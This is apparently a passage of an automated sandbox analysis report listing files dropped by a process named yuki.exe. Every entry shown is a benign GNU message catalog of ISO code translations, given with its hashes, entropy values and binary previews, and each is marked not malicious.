                                                                                                    SHA-512:640ADB7F86B18BF3606E0FDBAD0DB67C78B41F31195DB9A20B11EB57FA386A236636F8B9C38B268D984B1F7508BC7DD1974A60777906D91D9E4B13AE86218603
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2609 messages, Project-Id-Version: iso_3166-2 '\345\237\203\347\223\246\345\262\233'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):116542
                                                                                                    Entropy (8bit):5.68384531677302
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Ul6DFALHWIuHoe5p1OEJpE2IAYb9i0vHdojTUB7kz:Ul65ALLuIe9dG9JvKjoBAz
                                                                                                    MD5:B03642F0F2FA1DBEEC606E16BEC80B01
                                                                                                    SHA1:EEC23F8EF67EBEA96266DD41174BC8740E6FAD2C
                                                                                                    SHA-256:E465CC5648EF218A4B4450970FAC9EEE7C8ABEA8A776CFB8381E6DF853847D29
                                                                                                    SHA-512:EFD12AA88823814B57B95D7B84B44389E3DAE972167A94B2BC0E37481666890F01E9FED5E849178316A8DB7D96D14480E8AF8A1E1E4385245F959C16D393440D
                                                                                                    Malicious:false
                                                                                                    Preview:........1........Q......,.......................................................................................................................!.......*.......2.......8.......A.......K.......R.......b.......l.......{...............................................................................................................................................................*.......3.......?.......T.......c.......m.......v....................................................................................................................................................... .......'...............7.......G......._.......l.......z.......................................................................................................................(......./.......5.......A.......H.......O.......W.......d.......n.......v...............................................................................................................................................'.......0.......9.......B.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\350\213\261\345\261\236\345\215\227\346\236\201\346\264\262\351\242\206\345\234\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2696
                                                                                                    Entropy (8bit):5.944815216832334
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3g/j+vGqIfdvqN5CoUIqW96G0jRCWlnaHr3+x4z5QLkTRZ:rLvgr+yaCo6W96tjRCWlf4zGQTRZ
                                                                                                    MD5:2EBDE00B6409A0EF157A52DDD85B328B
                                                                                                    SHA1:C9F3719429693D332DDCFB8BD5C2ED3DF9AEF4EF
                                                                                                    SHA-256:8C60C5B4A31F66A1157A98656034F211EB3CC71A4A9A72811C33560227E84FFB
                                                                                                    SHA-512:BFD1F67AE2D7F03993D3EBA6B8EEB984F2E09E47E34D0AA14ED669C37B2CEA92D6A6C25FA5681DE8940171DD871F323FCA381030A46E8532C8C988E4AAA9028A
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................!.......*...........,...'...E.......m.......w...............................................................$...............D.......N.......d...........................................$...........................'.......1...'...M.......u........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 '\351\235\236\346\264\262\345\274\200\345\217\221\351\223\266\350\241\214\350\256\260\345\270\220\345\215\225\344\275\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9620
                                                                                                    Entropy (8bit):5.6201600800181515
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFc00khg6VRyK0G/2LCntxaqEXum9RJnJ7s9Bu:Sok66TL0G/Uo/aqPm9RJJ7n
                                                                                                    MD5:8E8C5690F386248D74DC9F8CB5AA2DE8
                                                                                                    SHA1:7209C8E6B44512BC813303233C6B77DBFE594421
                                                                                                    SHA-256:2B53552281691AC8022D60720D59FD4E1A12EBC9B2F5BBBED0189C3D2C1E8A82
                                                                                                    SHA-512:3D45F967186AF67BAA0A75764B4FF5CE9F6678B4C9A8283EF51492E220B4AB5F6CE2C81C67DFA8FA5BF350643370D320CFA9949C7BB2E4B037F78C879461E7C0
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 309 messages, Project-Id-Version: iso_639-3 '\351\230\277\345\270\203\345\223\210\345\205\271\350\257\255'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14527
                                                                                                    Entropy (8bit):5.434937975805054
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:x9T/i248S2WFC7N/EjFMrt1NBVPzHGrOnI9SL0O3W:3/ZRLD9E5mHGSnI963W
                                                                                                    MD5:C31A05140A7B9E5F3F4DAEA192283074
                                                                                                    SHA1:7B437FD8362456489493076F60B3D8182A9DF6B0
                                                                                                    SHA-256:4FF2D8D7C40A1134F6EF12E2F4E859132322834F8C89A61AD15E925E81E39429
                                                                                                    SHA-512:9F803CD9D52B58835B6DBABF86B52DC3CC4667DC10FD1EE2924F22824FFF903F83D6CD237A4F548FFF5A6F0918CF144CB9F92EB57B7DE8DF402A77D0EC404F78
                                                                                                    Malicious:false
                                                                                                    Preview:........5...............l...............................................................(.......2.......7.......@.......F.......N.......U.......].......d.......m.......v.......~...............................................................................................................................!.......&.......-.......7.......?.......E.......M.......U.......^.......e.......n.......w...............................................................................................,.......?.......L.......].......i.......x.......................................................................................................................................".......(.......1.......3.......8.......K.......R.......Z.......b.......~............................................................................................................... .......#.......)...............7...#...>.......b.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 91 messages, Project-Id-Version: iso_15924 '\351\230\277\345\276\267\346\213\211\345\247\206\346\226\207\345\255\227'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4992
                                                                                                    Entropy (8bit):5.578022047213081
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ldGh+82Kaj+8lsJbPNNiopje/R5lpT6ONYYeEydXlyOz9w:l2UKaZsBBjmN+YDy/j9w
                                                                                                    MD5:53E363D1E6447A11F497CEC678BA2BDE
                                                                                                    SHA1:9DA8B6F253D52679890A9D35E4025F8930DCC694
                                                                                                    SHA-256:4B0B3638CAC11692E80EAD14D36979903CA3A6B35569295B834AFE229E2141E6
                                                                                                    SHA-512:25D29364C13CC36E863536DA8B04F330C073DFBBE67D8909FE919B123DDCC6617E2D80739916CDD42F1C232422EC8DE9834AAA3FBB3180268580E99DF369FF4D
                                                                                                    Malicious:false
                                                                                                    Preview:........[.......................................................................................................".......+.......2.......:.......C.......I.......P.......U.......^.......d.......k.......s...&...|...................(...................................).......;.......P.......[.......b.......h.......q.......z.......................................................................................................................1.......H.......W.......].......f.......o.......y...............................................................................................................%.......0.......;.......A.......H.......W......._.......i.......q.......x...................................................................%...............................................'...........%.......5.......B.......R......._.......o.......|...................................................................................3...........E.......^.......t...........................$.......!...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\351\230\277\345\257\214\346\261\227'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23388
                                                                                                    Entropy (8bit):5.669045544010439
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosB6odw6kx46nbjz5wsWP48WAINiZG3VsquQdGCrF1NLdP:0oa64S48fmsWP48WAIXztMgDF
                                                                                                    MD5:D8FA6C2039072AED78E11AAF93223A0A
                                                                                                    SHA1:F142FDE2A3FCC9F9F6AF65EA93DDBFD065467121
                                                                                                    SHA-256:D38B4EA68B55403496B2220BD6BF763DD7B931B94D110707467B5DC6182F5BB2
                                                                                                    SHA-512:263CF029A62EA519CC8B6161900E211EEE1F044A6ACE9A06D8C7B81330839CEF9C9E64BDBD0782E09198FA8A89B364BE96F4BA23A421065E2DC462668F7D9D72
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\350\213\261\345\261\254\345\215\227\346\245\265\346\264\262\345\234\260\345\215\200'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2714
                                                                                                    Entropy (8bit):5.9462307144431135
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3vQA8+vGqIfdvqN5CoUvd6LC6nguQgdV7MDcbkt:rLvvO+yaCopC6nguQWMDoG
                                                                                                    MD5:0CB56C44851E6E5FF1AB468CD1DBA335
                                                                                                    SHA1:0680B79A4BEE79CFB2C106B05FF91F1A9088CE30
                                                                                                    SHA-256:EF6250A60E66C2003FE70FD89B39DB3763693061DDB026CDD08DEDAB7D217880
                                                                                                    SHA-512:77B6B471741A054A1E8B955D0B69942EBE5A589D4D0DF3A7BEF40F2304D70A1A29FCDA96810C4268E40919BCD839DC2C087802104F1302457B88750CAE249925
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................!.......*...........>...'...Z...............................................................................-.......:.......S.......].......s...........................................$...................#.......9.......C...'..._................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 167 messages, Project-Id-Version: iso_4217 '\351\230\277\345\257\214\346\261\227\345\260\274'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8815
                                                                                                    Entropy (8bit):5.590474814236245
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5QDBDr5hlm/DQExKbutTN4KMJ5pjXE2SILCDYmps6Jq87KSlLL5f7xFTrxAnIbJe:aDRBm/DQExKaN6K07xLC1y87K+5n2M8
                                                                                                    MD5:995920373306F31C7AA8EA329B259412
                                                                                                    SHA1:32CCFDF2BEC45FD124F5993E918FF689D2272391
                                                                                                    SHA-256:0C532A380D8F9CFA57442733420D22A739B04C0EFDFBCD7920079ED72EFC858F
                                                                                                    SHA-512:1F8B8B00ED7B746C8808E1D0622E9B7D9F5CB6D5F2965ACA9A31B6BFAF38A650A85FC34D6A22B590E36E71ACD7C763C40C842E6DFAA3014E07C1FACA31709A13
                                                                                                    Malicious:false
                                                                                                    Preview:................T....................................... ......./.......=.......K.......].......n.......~...................................................................1.......3...'.......[.......j.......x...................................................................0...........3.......B.......Q.......a.......r.......~.......................................................................................................".......1.......6.......M.......Y.......`.......k.......{...............................................................................................................(.......-.......2.......@.......G.......L.......Q.......`.......d.......l.......r.......................................................................................................".......1.......@.......^.......q.......................................................................................................!.......*.......9.......E.......M.......R.......].......b.......o.......w.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7 messages, Project-Id-Version: iso_639-5 '\344\272\232\351\235\236\350\257\255\347\263\273'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):886
                                                                                                    Entropy (8bit):5.647816607485701
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:mmYAQy1H0PXTt0Up/sCW/UKXmGz3c+W6ZWEc:xYz/CUpRW8n63qEc
                                                                                                    MD5:BAA56A6DBEE31790F261E59761EA0E1D
                                                                                                    SHA1:B6DEDFEC69CC2B9E37E2622081B740F611977993
                                                                                                    SHA-256:1DF48AB1D2591A6AFD93E1383A77D60C73CFDDB23D0DBF1D2A00715CA5EE25ED
                                                                                                    SHA-512:D54C653F0B31D1282A25DEE697CC07BF6FDDEC3C47F47F37808D3A465B91104CBFC544953DB894B35D8E604DA6BEC580FA61520A8886D12739E94CD4AA9C0EEE
                                                                                                    Malicious:false
                                                                                                    Preview:................T...............................................................(.......<...............&.......9.......R......._.......i................................................Afro-Asiatic languages.Algonquian languages.Atlantic-Congo languages.Austro-Asiatic languages.Chinese (family).Mongolian languages.Project-Id-Version: iso_639-5.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2021-12-27 13:53+0000.Last-Translator: Dingzhong Chen <wsxy162@gmail.com>.Language-Team: Chinese (Simplified) <https://hosted.weblate.org/projects/iso-codes/iso-639-5/zh_Hans/>.Language: zh_Hans.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=1; plural=0;.X-Generator: Weblate 4.10.1.....................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 '\344\272\236\351\235\236\350\252\236\347\263\273'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7424
                                                                                                    Entropy (8bit):5.544579708766503
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2os9la3RSlSE0BfCuXr5VcJHVCA1qPw6cBt8b9mG6E6ubofnwIff6:4SDxWmJSE0BfNcaCjob9YkAnwIff6
                                                                                                    MD5:2B7C6599A92A9D65FC9F57312472776C
                                                                                                    SHA1:5890BD0206CE511B5B21F1651264472CACDD9182
                                                                                                    SHA-256:30098584CF9E00017D3F02E6A5F250C8231D7D1A404C4F9E12343B2911772A30
                                                                                                    SHA-512:5EA3812F6DAC76A942F9BA8CA5F620283B69B93EB1741B1A1B92A4D7E39AA357F1F66CE864D65D762DEF3E686B4FA2AD291F1F292297145B66B3A468DC093ACF
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...................................................................+.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 '\351\230\277\345\276\267\346\213\211\345\247\206\350\252\236'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10644
                                                                                                    Entropy (8bit):5.746980438591726
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:d6+xIAG4ltU4WjV9qWxa5hW8Ge01zW3SRN/ytFOTn3G:fIAG4g4WjVDxa5hW8zizW3SRxytFOjG
                                                                                                    MD5:13417C016E0AAD594BD7C7287AD017D0
                                                                                                    SHA1:B1FF12A10E815CF8791E2CE14972DD6FA36F8A0E
                                                                                                    SHA-256:ADD4E88F132F440BF203E3F69A87CDA6E6D005EBB0F66412600E0209E71B2457
                                                                                                    SHA-512:28603873B13E1C0E9331F35DDB68CE5549658380E667B759513D385660BBE62CC1EB84822AEA5E17B0165AD486666201650A9BE455AEFD8FD3C1112EAE715CD9
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\351\230\277\345\257\214\346\261\227'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23390
                                                                                                    Entropy (8bit):5.668133804267187
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosnDNB7xW46nbjz5wsWP48WAINiZGnd1YM3KpAQdzWN:0oIDZW48fmsWP48WAItder+5
                                                                                                    MD5:4A24F8814F34B5BB13AB472C0108ACD5
                                                                                                    SHA1:77CB7CE0822E3A2EC38BCAF61DA0E5FF388917E2
                                                                                                    SHA-256:8D91C91A67EFFEB72FE92237C5680B2E61FF8A25B347FB7D78207804FC6E54ED
                                                                                                    SHA-512:F4C36FED545F38217D7E1A86490DED87756A9D0C20DF17B6049571D8AA883B20240DEB55A4518F544E421DEA2AB2C98DB119A71F440DA0B5AD59C8BEAAF53E53
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-2 '\344\272\236\351\201\224\347\264\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18208
                                                                                                    Entropy (8bit):5.335306305611884
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:ABUR4mdlEru6mw20dfXFopZP3CM4cfASmuSEPWtwsNjs:Py241op9acfAOSEodjs
                                                                                                    MD5:C70D1EC1F80AE1D77BA67BA75005D4B3
                                                                                                    SHA1:7A81F198692E0C21D279A4AD67221151946C33E7
                                                                                                    SHA-256:848F9C0E64A85A162BCC3571D38FEC19092ABEB8C0D501338BE3BAD2A03957D5
                                                                                                    SHA-512:40C45A505F41ECBE10EB6D54E564FE077FC99FC14D28D9CC3880AA749D17A6F3469998B2DA8839BF539FAB2A85E9982D7088BF838C24B61569642B2F8E052F78
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......5$......<$......D$......Q$......]$......i$......p$......u$......~$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%...... %......)%.......%......6%......<%......A%......H%......P%......W%......_%......i%......s%......{%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......&&.......&......=&......E&......L&......U&......`&......h&......o&......z&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'.......'.......'.......'......)'......2'......;'......A'......G'......\'......e'......l'......t'......|'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\350\213\261\345\261\254\345\215\227\346\245\265\346\264\262\351\240\230\345\234\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2685
                                                                                                    Entropy (8bit):5.926713760364262
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf35aGs+vGqIfdvqN5CoUqqe6CTguwGL0l08rOqDokYN:rLvE+yaCo2e6CTgujL+1Dor
                                                                                                    MD5:67FB048E1971C242E4664B4CE15376F3
                                                                                                    SHA1:BA1E264C8AB51588D770A1CE5F97EA1092D6F79A
                                                                                                    SHA-256:B5CC3AA0989EFC9E31C442D977EC3AAE132EC4B7434C493C900B7DE6572A2702
                                                                                                    SHA-512:601E7DC30371713D0B8E57C4B0D152D1FC48ED0753EFBE8C0F506379461666E84E204E7DC15F828E08D79D2BDCB70593E6BA4FC4FBEE39CFFE162FB1C43BFBE4
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................!.......*...........0...'...L.......t.......~..............................................................."......./.......B.......L.......Y.......r...................................$...................................)...'...E.......m........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 175 messages, Project-Id-Version: iso_4217 '\344\272\236\350\241\214\345\270\263\346\210\266\345\226\256\344\275\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9664
                                                                                                    Entropy (8bit):5.6961528467597935
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:kUpt7w//yK0n2LC9GL2VMXo41NijnYrJLYp:kowL0nUWQijne8
                                                                                                    MD5:AFD2C344A684A1C7BF870CD577525557
                                                                                                    SHA1:2EAA731F6FF0F9A4A8740255BD26C69F4FF707BF
                                                                                                    SHA-256:971D71E7F99929B4240BFFF179B2B6BFE239E44538C81876EC784347DC6AD918
                                                                                                    SHA-512:C844BFB92C682AD09958749D071085A14281F4BB5AFC73B47DD433E114CA9FE06EF47ED1EBF2C1236DF4B78D8E8C6D3FD9670198C3B87883F1C35C37D8F57C8E
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................*.......:.......I.......N.......U.......e.......v...........................1.......3.......9.......7...Q.......................................................................................#...0...0.......a.......p......................................................................................................................./.......>.......P......._.......d.......{.......................................................................................................................&.......6.......F.......V.......[.......`.......n.......u.......z.......................................................................................................................&.......6.......I.......O.......U.......[.......j.......y.......................................................................................!.......+.......<.......J.......Z.......c.......r.......w...............
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 634 messages, Project-Id-Version: iso_639-3 '\344\272\236\345\270\203\345\215\241\350\226\251\350\252\236'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32698
                                                                                                    Entropy (8bit):5.595662432172395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:7eDRtKftrFwAQa5pGufpiGO6K9Y80p4K9HOxfhfC3eJVolJF+AZc:7y6fwuxiGw+/4EuxZfCuJVo3F+Cc
                                                                                                    MD5:D00A0ADFE4D5B8301EEBB5F4F5673AC6
                                                                                                    SHA1:EEB0D4C4CCD476042BE3A28ED58057CD06B933AF
                                                                                                    SHA-256:2ABA177136ED7305C9B9B4867C8AE5A0562C92DD5C3D93F319564605C06EB4D0
                                                                                                    SHA-512:8D05B519112167AC1D50585D8459ED5A1F09CBA2BBFE253E3B614DD065F9956F9B7E57FBAB36EFB959D52073667AA36BEC33547D3C9ABA9D2358040056132661
                                                                                                    Malicious:false
                                                                                                    Preview:........z...........U....'.......5.......5.......5......$5......*5......B5......J5......O5......d5......m5......w5.......5.......5.......5.......5.......5.......5.......5.......5.......6.......6.......6.......6......&6......C6......K6......R6......j6......s6.......6.......6..#....6.......6.......6.......6.......6.......6.......6.......7.......7.......7......#7......87......@7......W7......^7......f7......m7......s7......~7.......7.......7.......7.......7.......7.......7.......7.......7.......7.......7.......8.......8.......8......48......=8......C8......M8......e8......l8......t8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......9.......9......39......;9......R9......h9......u9.......9.......9.......9.......9.......9.......9.......9.......:.......:......$:......1:......B:......N:......]:......j:......y:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......;.......;.......;......+;......4;......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 130 messages, Project-Id-Version: iso_3166-1 'I-Afganistani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5882
                                                                                                    Entropy (8bit):4.7288758409509875
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:3YYWu9jC1UkztmamLV4lhslTBFVeRSDpyJ+wvTYxjx+njSGN8E55Ll:oYWmjC174DG+NFViFTMjceGN31l
                                                                                                    MD5:6551801B295DE2478A774CEB2CBA1ADE
                                                                                                    SHA1:41A44A206E860992FD373B6103F448A3DC0A7E97
                                                                                                    SHA-256:31F5C6E5F04F385BC91DD8861654B148F3CC8A39AE2EC0009F6C5B351969A121
                                                                                                    SHA-512:54775B59A408E77D3FA2325380193C424F53DDE2FD93F17C593E850543436FB2F74025211DBB06D45E252E42A782BCE707FAA5FB3FDD7FFA649BABA0BCF66C44
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<...............................................................0.......:.......D.......L.......W.......b.......k.......s.......{....................................................................................................................................................... .......3.......9.......E.......W......._.......g.......p.......u.......}....................................................................................................................................................................... .......(.......0.......6.......@.......K.......V.......].......b.......h.......s.......}...............................................................................................................................................................3.......;.......B.......K.......V.......l.......t.......{.......................................................................................................................................!.......).......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):415
                                                                                                    Entropy (8bit):5.207243815986905
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijoYYxA9Ct0vOuvP0NXzffs57/RWOFPJt3buK72AFFKuK7BK9XmBQ8KMW0YEi9:i4oxxjt02Uky/XyeFvvXmBQWi9
                                                                                                    MD5:AD64A5CAEA702CF125FAC1C8F319C799
                                                                                                    SHA1:7E8D0762F15F9516BC9423FEF575FD5D5DB015AF
                                                                                                    SHA-256:53CB30ACD0D05E80B92F6FAE8D975C3BAF2F78F14A4FA5A7EC74079F70666AAE
                                                                                                    SHA-512:636C444466EC106D5996DB8489B1F0F1DE24478FED4CD0E73274BBA26CECE3DF6385C1B36EF46F6189E5C69C60772DA6BB1C97C636FB159774A32BD9B99A5D5F
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...e...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2002-01-05 18:50+0000.Last-Translator: Thobile Mhlongo <thobile@translate.org.za>.Language-Team: Zulu <zulu@translate.org.za>.Language: zu.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 50 messages, Project-Id-Version: iso_639-3 'Isibhunu'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2596
                                                                                                    Entropy (8bit):4.777036996518915
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:z0giIttnOutk71mo/s5AotxziMUZq+fBivVAl065FnhhQz:Qv2nzy71mokhBiMX+ZeVAl0cn3Qz
                                                                                                    MD5:3FA739A13AA12B27E0E61F2A270F22DA
                                                                                                    SHA1:AD7E464F1197653480F052A21DAE8927735532E3
                                                                                                    SHA-256:43812144292CF014E10DFECACCB6CCC7BF3C2FF26C2DF52627C6458A6C85FC51
                                                                                                    SHA-512:2F877BFE890CEAF6AA397859F91463F01FC7F5C640E1C38F4F2428092E9B6A8A16838A38807D0EBFFB7F093A207FF0223D43E797FC40BEE6F11D0BBDCB081FE5
                                                                                                    Malicious:false
